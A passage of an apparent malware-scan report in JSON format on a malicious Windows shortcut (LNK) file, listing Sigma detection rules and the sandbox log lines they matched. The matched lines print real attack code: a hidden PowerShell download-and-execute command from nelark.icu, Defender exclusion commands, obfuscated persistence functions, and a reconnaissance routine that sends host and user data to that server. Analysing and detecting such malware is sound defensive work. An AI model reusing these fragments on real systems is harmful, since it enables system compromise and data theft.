"Path": "",
"ScriptBlockId": "d95ea55d-0143-47fa-8e60-f5b255db95b2",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Add-MpPreference -ExclusionPath C:\\Users\\Bruno\\AppData\\Local\\Temp",
"Path": "",
"ScriptBlockId": "93b1b26b-e625-4922-ae0f-b29343caef62",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Add-MpPreference -ExclusionPath C:\\Windows\\System32",
"Path": "",
"ScriptBlockId": "51388c04-ae72-46a6-b989-163fe84aec4b",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "Add-MpPreference -ExclusionPath \"$env:windir\\System32\"",
"Path": "",
"ScriptBlockId": "ee7bd9f5-7122-41c0-b4cf-ab3068fc5221",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "d6ff8dca8c8ea9fa750972dd032542746369179e3aaceccc1c3f2cc2a35f5d25",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PSScriptPolicyTest Creation By Uncommon Process",
"rule_description": "Detects the creation of the \"PSScriptPolicyTest\" PowerShell script by an uncommon process. This file is usually generated by Microsoft Powershell to test against Applocker.",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"TargetFilename": "%WINDIR%\\temp\\__psscriptpolicytest_ubon2t2v.wee.psm1"
}
},
{
"values": {
"TargetFilename": "%WINDIR%\\temp\\__psscriptpolicytest_0lmv11b1.p21.psm1"
}
},
{
"values": {
"TargetFilename": "%WINDIR%\\temp\\__psscriptpolicytest_5maxqsnk.22k.ps1"
}
},
{
"values": {
"TargetFilename": "%WINDIR%\\temp\\__psscriptpolicytest_q5jimyjk.2g4.ps1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "dc48d8314d305b4c97b9f813958e20738bb989b83928e70ea811bb7c0bf7e197",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Invocations - Specific - ProcessCreation",
"rule_description": "Detects suspicious PowerShell invocation command parameters",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentCommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule",
"CommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\svchost.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"CommandLine": "powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "ece68c3b6fda1fe5c7d8707c5dd9099cf564ed0e7e7b480e97278c475f10e5a7",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Execute Batch Script",
"rule_description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (e.g. .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "function sdu () {\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\", \"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\", \"\")\r\n\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro\". [TRUNCATED]",
"Path": "",
"ScriptBlockId": "aa066c36-b4fc-42bc-9e1a-a8292d983389",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function persist {\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:TEMP\"\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:windir\\System32\"\r\n\t\r\n\t$url2 = $mainUri + \"res/post_proc.php?fpath=scheduler-once\"\r\n\t$dst2 = $env:TEMP + \"\\scheduler-once.bat\"\r\n\t$WebClient = New-Object System.Net.WebClient\t\r\n\t$WebClient.DownloadFile($url2, $dst2)\r\n\t\r\n\t$dst3 = $env:windir + \"\\System32\\sysmon2.bat\"\r\n\t$dst4 = $env:w [TRUNCATED]",
"Path": "",
"ScriptBlockId": "d95ea55d-0143-47fa-8e60-f5b255db95b2",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "5aeddb41-a6bc-40c3-94ba-2530bf8dd844",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "function sdu () {\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\", \"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\", \"\")\r\n\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro\". [TRUNCATED]",
"Path": "",
"ScriptBlockId": "19bddaf3-24cc-4726-82f3-63e6d7e62964",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"CommandLine": "powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"CommandLine": "%WINDIR%\\system32\\windowspowershell\\v1.0\\powershell.exe",
"Image": "C:\\Windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "5ef6bc365a01e6ef90c1fc4f49006e9a8fe08e82c0a9ce80c10153915771547b",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Get Local Groups Information - PowerShell",
"rule_description": "Detects the use of PowerShell modules and cmdlets to gather local group information.\nAdversaries may use local system permission groups to determine which groups exist and which users belong to a particular group such as the local administrators group.\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n$dkdlel = \"a\"\r\n$lognmfl = \"OneDrive.log\"\r\n$fhrmvkdlf = \"\\OneDriveLog\\\"\r\n\r\nfunction gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"-------------------------- [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a4d52191-f873-49f1-9b13-9fdeb4adbdac",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"---------------------------------------------\" >> $fhrmvotm\r\n\t$currentUser = Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object -ExpandProperty UserName \r\n\t# $currentUser = \"$en [TRUNCATED]",
"Path": "",
"ScriptBlockId": "0b81f408-7507-4a5a-bdb3-0cb2503e17e3",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "{\r\n\t\t$groupName = $_.Name\r\n\t\t$members = Get-LocalGroupMember -Group $groupName\r\n\t\t$members | Where-Object { $_.Name -eq $currentUser } | ForEach-Object {\r\n\t\t\t$groupName\r\n\t\t}\r\n\t}",
"Path": "",
"ScriptBlockId": "92a2ecb2-81e5-4542-8dd6-4456b40947f9",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
"rule_id": "80e1441e8251586c742da610b4bceb4d94fbe79f4e8b64b9745b6a11da90d7c1",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Script With File Upload Capabilities",
"rule_description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n$dkdlel = \"a\"\r\n$lognmfl = \"OneDrive.log\"\r\n$fhrmvkdlf = \"\\OneDriveLog\\\"\r\n\r\nfunction gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"-------------------------- [TRUNCATED]",
"Path": "",
"ScriptBlockId": "a4d52191-f873-49f1-9b13-9fdeb4adbdac",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function sif() {\r\n\t$fph = $env:windir + \"\\Temp\" +$fhrmvkdlf\r\n\tNew-Item -Path $fph -Type directory -Force\r\n\t$hFLgPth = $fph + $lognmfl\r\n\tgif $hFLgPth\r\n\t$hexdata =[IO.File]::readalltext($hFLgPth)\r\n\t$bytes = [System.Text.Encoding]::UTF8.GetBytes($hexdata)\r\n\t$b64 = [System.Convert]::ToBase64String($bytes)\r\n\t$udivkv = $mainUri + \"res/index.php\"\r\n\t$uid = gid\r\n\t# Invoke-WebRequest -Uri $udivkv -Method Post -Body \"uid=$uid&result=$b64\"\r\n\tpostRequest $udivkv \"uid=$uid&result=$b64\"\r\n\tRemove-Item -path $hF [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4e7b0706-2a37-4037-af3a-b75aa5b5fb33",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "b0d225f3239543a37159ba2855ee1e7972c6bff3c83ce7aed9056599f6ee6314",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Process Discovery With Get-Process",
"rule_description": "Detects use of the Get-Process cmdlet to enumerate the processes running on the local computer.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"Path": "",
"ScriptBlockId": "189d1f84-c320-4cb7-8fa3-715bbefca8a1",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function action {\r\n\t#Set-ExecutionPolicy -ExecutionPolicy Bypass -Force\r\n\tinstant\r\n\t$sysProc = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\twhile ($null -eq $sysProc) {\r\n\t\tgCommand\r\n\t\tStart-Sleep -Seconds 5\r\n\t\t$sysProc = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\t}\r\n}",
"Path": "",
"ScriptBlockId": "f12e231f-9aac-412a-be32-b4b73178ce41",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nfunction newDir($path) {\r\n\tif ((Test-Path $path) -eq $false ) {\r\n\t\tNew-Item -ItemType Directory -Path $path\r\n\t}\r\n}\r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.log\"\r\n\t\tif (Test-Path $local) [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "b1b561d6-f30f-4c48-b9d7-b59f4e127079",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function action {\r\n\tSet-ExecutionPolicy -ExecutionPolicy Bypass -Force\r\n\tAdd-MpPreference -ExclusionPath \"$env:windir\\System32\"\r\n\t$exist = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\tif ($exist.Count -gt 1) {\r\n\t\treturn\r\n\t}\r\n\twhile ($true) {\r\n\t\tgCommand\r\n\t\tStart-Sleep -Seconds 5\r\n\t}\r\n}",
"Path": "",
"ScriptBlockId": "09998871-6404-48e7-98ea-8b74ad96fcf6",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"Path": "",
"ScriptBlockId": "0aa6d143-3ab3-4a7f-9b19-fa0dc39031ea",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
"rule_id": "c085cde9af85b182e783b8d7b42d66d3d0efe08696b4fe7946da3d5d1a2cd51e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Obfuscation Using Alias Cmdlets",
"rule_description": "Detects Set-Alias or New-Alias cmdlet usage, which can be used as a means to obfuscate PowerShell scripts.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Set-Alias -Name ncim -Value New-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue",
"Path": "",
"ScriptBlockId": "f3e47601-30e6-440b-95ae-5c298902c28b",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "c0ad3fd3010dc41b8f54cd4f911b4bf081d2d195b0e7548cdc60ebcee9250ad3",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Get Current User",
"rule_description": "Detects the use of PowerShell to identify the current logged user.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n$dkdlel = \"a\"\r\n$lognmfl = \"OneDrive.log\"\r\n$fhrmvkdlf = \"\\OneDriveLog\\\"\r\n\r\nfunction gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"-------------------------- [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "a4d52191-f873-49f1-9b13-9fdeb4adbdac",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"---------------------------------------------\" >> $fhrmvotm\r\n\t$currentUser = Get-CimInstance -ClassName Win32_ComputerSystem | Select-Object -ExpandProperty UserName \r\n\t# $currentUser = \"$en [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "0b81f408-7507-4a5a-bdb3-0cb2503e17e3",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "low",
"rule_id": "ec63f6d5ea6cf1a23c7c491b28d6b350219d23a95ea95516ce0256730fb7912c",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Local Accounts Discovery",
"rule_description": "Local accounts and System Owner/User discovery using operating system utilities",
"rule_author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\quser.exe",
"Image": "C:\\Windows\\system32\\quser.exe",
"EventID": "1"
}
}
]
}
],
"last_analysis_stats": {
"malicious": 33,
"suspicious": 0,
"undetected": 29,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 0,
"type-unsupported": 13
},
"size": 22008,
"type_tag": "lnk",
"total_votes": {
"harmless": 0,
"malicious": 2
},
"crowdsourced_ids_stats": {
"high": 0,
"medium": 0,
"low": 4,
"info": 0
},
"crowdsourced_ai_results": [
{
"source": "palm",
"analysis": "The LNK file executes PowerShell with the window hidden to run a multi-stage command. The PowerShell script first performs data extraction from the LNK file itself: it drops and executes a decoy PDF from embedded data (offset 20KB) and achieves persistence by writing another LNK file (containing the first 10KB of the original LNK) to the user's Startup folder as 'OneDrive.lnk'. Finally, the script uses heavily obfuscated PowerShell (string substitution and concatenation) to construct and execute the command: `(New-Object Net.WebClient).DownloadString('https://nelark.icu/xftaswx/res/bb.php')`. The downloaded content is then executed using `iex` (Invoke-Expression), confirming classic downloader malware functionality.",
"category": "code_insight",
"verdict": "malicious",
"id": "17fe715f3819baa851126d52af8b70c0016bf9288b0b0ebbc3715053973739e4-file-palm"
}
]
}
}
}